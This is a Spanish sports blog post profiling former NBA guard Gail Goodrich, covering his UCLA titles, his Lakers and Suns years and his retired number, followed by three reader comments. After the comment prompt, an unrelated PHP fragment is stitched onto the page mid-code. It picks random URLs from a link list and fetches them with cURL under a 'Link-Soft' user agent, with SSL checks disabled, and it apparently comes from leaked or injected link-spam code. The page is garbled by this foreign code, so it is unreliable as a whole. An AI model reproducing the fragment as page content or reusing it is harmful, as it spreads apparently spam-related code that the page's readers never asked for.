¿Quién fue Gail Goodrich?

01 de September de 2013 por txusma

En la lista de los dorsales retirados por los Los Angeles Lakers aparecen auténticos iconos de la liga como Shaquille O’Neal, “Magic” Johnson, Kareem Abdul Jabbar, Wilt Chamberlain, Elgin Baylor o Jerry West. También encontramos a James Worthy, por todos harto conocido, a Jammal Wilkes y a Gail Goodrich. De todos estos jugadores son si duda estos dos últimos los más desconocidos para el gran público. Como hace mucho tiempo que se lo prometí a TheDeerHunter, hoy nos vamos a ocupar del número 25.

Gail Goodrich es, ante todo, un mito universitario. Jugó en la universidad de UCLA y formó parte del equipo que dirigido desde el banquillo por el mítico John Wooden ganó los campeonatos del 1964 y 1965 iniciando así la época más gloriosa de un equipo en la historia de la NCAA. Los Bruins de UCLA ganaron nada más y nada menos que 10 títulos entre 1964 y 1975 y sólo faltaron a su cita 2 temporadas (la 1965-66 y la 1973-74). 

La historia podría haber sido muy diferente si Goodrich hubiera recalado en la USC como era su intención ya que su padre había sido jugador allí. No obstante, su corta estatura (1.73m en su primer año de universidad) no convencía a muchos equipos y fue John Wooden el que acabó mostrando más interés e incorporándolo a su proyecto. Su primer año fue de adaptación pero en el segundo lideró al equipo a la temporada perfecta. Los Bruins ganaron los 30 partidos que jugaron aquel año y se alzaron con el campeonato gracias en buena parte a los 21’3 puntos que promedió Goodrich. A pesar de que el equipo fue prácticamente desmantelado, al año siguiente UCLA volvió a alzarse con la victoria con un Goodrich en estado de gracia. Promedió 24′ 8 puntos por partidos y estableció la mejor marca anotadora en una final de la NCAA tras endosar 42 puntos a Michigan. Bill Walton rompió esa marca 8 temporadas más tarde (anotó 44 puntos frente Memphis State) pero a día de hoy continúa siendo la segunda mejor anotación en una final de la NCAA. En esa última temporada fue nombrado el College Player of the Year junto a Bill Bradley (otro jugador que se merece un artículo). Con semejante historial no sorprende que la universidad de UCLA retirara su número 25 en el año 2004.

En 1965, Gail Goodrich se presentaba al draft de la NBA midiendo ya 1’85 m. pero las dudas sobre su altura y su fuerza continuaban. Muchos dudaban que fuera capaz de trasladar su juego a la dura liga profesional pero sus conocidas virtudes (gran manejo de balón y habilidad para distribuir) unidas a la gran fama ganada en la universidad hicieron que Los Angeles Lakers le escogieran en el draft mediante un Territorial Pick. Hasta 1965, los equipos tenían la oportunidad de renunciar antes del draft a su primera elección y escoger a un jugador que hubiera formado parte de una universidad situada dentro de un radio de aproximadamente 80 km. Con estas elecciones, que se eliminaron justo al año siguiente, la liga pretendía ganar el apoyo de los aficionados locales y afianzarse en el territorio. Goodrich se unía de esta manera a un equipo que contaba con Jerry West y Elgin Baylor en sus filas.

Los 3 primeros años de Goodrich en los Lakers no fueron precisamente un éxito. En su temporada rookie jugó 65 partidos pero su acierto en el tiro fue muy pobre y apenas disputó 15 minutos por partido. En su segunda temporada mejoró sus registros (12’4 puntos y un 45% de acierto) pero repartía su tiempo de juego con su antiguo compañero Walt Hazzard. En la tercera temporada mejoró aún más su porcentaje de acierto que llegó al 48% pero ejerció de sexto hombre todo el año tras Jerry West y Archie Clark y tan sólo promedió 13’8 puntos por partido. La carrera de Goodrich parecía estancarse hasta que Jerry Colangelo, el GM de 28 años de una nueva franquicia de la NBA se cruzó en su vida.

En 1968 nacieron los Milwaukee Bucks y los Phoenix Suns y como es preceptivo se llevó a cabo un draft de expansión. Por aquella época la liga estaba compuesta de sólo 12 equipos (imaginaos la calidad de las plantillas) y cada uno pudo proteger a 7 jugadores. Los Lakers no protegieron en primera instancia a Goodrich y los Suns se hicieron con sus servicios. Titular desde el mínuto 1, “Stumpy” (como le llamaban en los Lakers debido a su baja estatura) se convirtió en la estrella de la franquicia y en el favorito de los fans de Arizona. Jugó 40 minutos, anotó 23’8 puntos, cogió 5’4 rebotes y, acallando las críticas que lo catalogaban de “metralleta”, repartió 6’4 asistencias por partido. Estos números le valieron para ser seleccionado para jugar el All-Star al lado de su compañero Dick Van Arsdale que había llegado a los Suns proveniente de los Knicks. Al año siguiente, totalmente afianzando en la posición de base titular, anotó algo menos (20 puntos) pero con mayor acierto y elevó el número de asistencias hasta las 7’5, el quinto mejor registro de toda la liga. Al término de aquella temporada, los Lakers enmendarían su error y se harían de nuevo con sus servicios a cambio del pívot Mel Counts.

En esta segunda época con los Lakers, Goodrich ya disponía de un rol bien definido. Jerry West se había convertido en un gran repartidor de juego y Goodrich era uno de los principales beneficiarios de sus pases. En su primera temporada llegó a los 17’5 puntos por partido pero fue en la segunda, en la recordada y legendaria 1971-72 de los Lakers, en la que Gooldrich explotó como anotador. Aquel año se fue a los 25’9 puntos por partido, el mejor de  su equipo y el quinto mejor de la liga, fue elegido de nuevo para jugar el All-Star, y junto a Jerry West, Wilt Chamberlain, Jim McMillian y Happy Hairston formó un quinteto prácticamente imbatible. Es el equipo que ganó 33 partidos consecutivos (marca a la que se han acercado los Heat este año) y que acabó la temporada con un balance de 69 victorias y 13 derrotas, el mejor hasta que aparecieron los Bulls de Jordan. Como no podía ser de otra manera, los Lakers se hicieron con su primer anillo desde que la franquicia se trasladó de Minneapolis a Los Angeles tras superar en playoffs a los Bucks de Jabbar y a los Knicks de Walt Frazier.

En las siguientes temporadas, Gail Goodrich mantuvo e incluso mejoró sus prestaciones pero los Lakers iniciaron un lento declive. En la temporada 1972-73 lideró de nuevo al equipo en anotación, fue seleccionado para el All-Star y llegó de nuevo a la final de NBA. Allí esperaban de nuevo los Knicks de Frazier que esta vez supieron parar el juego rápido de Goodrich, West y los Lakers y se alzaron con el anillo. Al término de aquella temporada, Wilt Chamberlain se retiraría y serían dos jugadores que llegaban ya a la treintena como Goodrich o West los encargados de liderar al equipo de California. “Stumpy” jugó su mejor año (25’3 puntos, 5’2 asistencias, 3 rebotes y 1’5 robos) y fue seleccionado para formar parte del mejor quinteto de la temporada pero los Lakers cayeron en semifinales de conferencia ante Kareem. En 1974 sería Jerry West el que se retiraría y dejaría a Goodrich prácticamente solo ante el peligro.

De cara al desafío contra el que se enfrentaba  en la temporada 1974-75 adelgazó casi 5 kilos para volver a su peso de la universidad y así mejorar su velocidad y resistencia. A nivel individual la decisión le dio sus réditos ya que consiguió su quinta y última presencia en el All Star Game gracias a sus 22 puntos y 5’8 asistencias por partido pero no fue capaz de clasificar a su equipo para los Playoffs. Al año siguiente llegó al equipo Kareem Abdul-Jabbar pero los Lakers se volvieron a quedar fuera de la postemporada por bien poco. Al final de aquella temporada, y debido a problemas salariales con la franquicia, Goodrich no ejerció su Player Option y pasó a ser agente libre. Firmó por los New Orleans Jazz pero debido a las reglas del momento, los Lakers tenían que recibir una compensación por perder un jugador veterano. Tras las negociaciones, los Jazz enviaron a los Lakers entre otras elecciones su primera ronda de 1979. Esta elección se convertiría años más tarde en un tal Magic Johnson.

Goodrich llegaba a los New Orleans Jazz para formar un temible dúo junto a Pete Marevich pero a las primeras de cambio una lesión en el tendón de aquiles le dejó fuera de juego. A pesar de los fuertes dolores que sufría intentó seguir jugando pero en enero de 1977 y tras 27 partidos jugando con dolor, decidió operarse y prepararse de cara a la siguiente temporada. Al año siguiente y ya con 34 años a sus espaldas, anotó 16’1 puntos por partido con un 49% de acierto en el tiro y jugó un importante papel saltando desde el banquillo. Aún jugó una última temporada, la que sería su décimocuarta. Al término de la misma y tras haber anotado 19181 puntos, decidió retirarse.

En el momento de su retirada, Goodrich era el undécimo mejor anotador y el décimo mejor asistente de la historia de la NBA. En estos momentos se mantiene en el puesto 47 y aparece en el TOP-10 de varias categorías estadísticas de la historia de los Lakers: puntos, asistencias, tiros libres convertidos y partidos jugados. Además mantiene el récord de la franquicia de más tiros libres anotados de manera consecutiva (40 y lo hizo en dos ocasiones). Por todos estas razones, y tras ser escogido para entrar en el Hall of Fame en 1996, los Lakers retiraron su camiseta el 20 de Noviembre de aquel mismo año, 17 años después de abandonar las canchas.

Otros personajes históricos “desconocidos” de la NBA

Comenta

3 comentarios a esta entrada

  1. jhc dice:
    #1

    desconocía a este jugador, aunque despues de leer el articulo veré un par de vídeos de el porque no pinta nada mal.

      Citar

  2. TheDeerHunter dice:
    #2

    Una auténtica bomba de zurdo. Un perfil de jugador que sólo se entiende en aquella época.

    No es un hecho baladí haber sido primera espada de los míticos Lakers de la 71-72, uno de los más potentes equipos de la historia (el de las 33 victorias seguidas). Fue el techo del proyecto Chamberlain-West-Baylor en LA y Goodrich fue la clave de que estos monstruos pudieran saborear la gloria por una vez (bueno, Baylor tan sólo parcialmente)

    El dúo de comboguards que formó con West, alternándose la dirección y ejecución es un modelo único en la historia de la liga y durante años se trató de imitar. Los dos se pusieron las botas gracias a esa asociación. Aquella temporada 50 puntos, 15 asistencias conjuntas… casi naaaa!!

    Con todo, soy de los que piensan que la retirada de la camiseta debe de ser algo particularmente excepcional y aún con lo que moló Goodrich de no ser por aquella burrada de campaña no le hubiera alcanzado el mérito. Ahora la comparación con el hipotético caso Gasol se hace necesaria.

      Citar

  3. Blade Petrovic dice:
    #3

    Conozco a este jugador gracias al 2k13, si es como en el juego gran anotador y que forno un espectacular backoourt con West, menudo equipo que tenian los Lakers en esa temporada, de los mejores de la historia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>